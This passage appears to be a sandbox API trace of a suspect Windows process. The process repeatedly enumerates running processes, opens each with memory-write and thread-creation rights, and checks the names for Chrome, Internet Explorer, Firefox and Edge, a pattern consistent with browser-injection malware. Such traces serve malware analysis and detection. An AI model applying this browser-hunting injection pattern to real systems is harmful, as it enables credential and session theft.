	[0241.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.563] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.564] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0241.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.564] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.564] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.565] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x8680
	[0241.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.565] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.565] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.566] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.566] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.566] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0241.567] CloseHandle (hObject=0x4fd0) returned 1
	[0241.567] Sleep (dwMilliseconds=0x64) 
	[0241.676] GetCurrentProcessId () returned 0x110
	[0241.676] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0241.678] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0241.679] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0241.680] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0241.681] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x8684
	[0241.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.681] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0241.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.681] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.682] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0241.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.682] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.682] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0241.683] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x8688
	[0241.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.683] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0241.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.683] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.684] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0241.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.684] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.684] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0241.685] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x868c
	[0241.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.685] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0241.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.685] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.686] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0241.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.686] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.686] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0241.687] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x8690
	[0241.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.687] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0241.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.688] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.688] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0241.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.688] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.688] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0241.689] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x8694
	[0241.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.689] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0241.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.690] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.690] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0241.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.690] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.691] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0241.691] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x8698
	[0241.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.692] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0241.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.692] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.692] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0241.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.693] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.693] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0241.694] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x869c
	[0241.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.694] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0241.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.694] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.694] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0241.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.695] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.695] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0241.696] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x86a0
	[0241.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.696] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0241.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.696] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.696] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0241.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.697] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.697] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.697] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x86a4
	[0241.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.698] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.698] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.698] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.699] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.699] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.700] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x86a8
	[0241.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.700] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.700] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.700] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.701] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.701] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.702] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x86ac
	[0241.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.702] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.702] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.703] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.703] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.703] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.704] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x86b0
	[0241.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.704] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.704] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.705] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.705] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.705] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.706] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x86b4
	[0241.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.706] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.706] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.707] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.707] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.707] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.708] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x86b8
	[0241.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.708] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.709] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.709] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.709] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.709] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.710] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x86bc
	[0241.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.710] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.711] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.711] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.711] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.712] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0241.712] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x86c0
	[0241.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.713] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0241.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.713] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.713] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0241.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.714] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.714] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.715] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x86c4
	[0241.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.715] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.715] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.715] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.716] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.716] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0241.717] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x86c8
	[0241.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.717] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.717] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.718] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.718] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.718] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0241.719] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x86cc
	[0241.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.719] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0241.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.719] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.720] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0241.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.720] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.720] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0241.721] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x86d0
	[0241.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.721] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0241.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.721] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.722] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0241.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.722] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.722] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0241.723] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x86d4
	[0241.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.724] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0241.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.724] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.724] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0241.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.725] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.725] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0241.726] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x86d8
	[0241.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.726] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0241.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.726] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0241.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.726] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0241.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0241.727] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0241.727] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0241.728] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x86dc
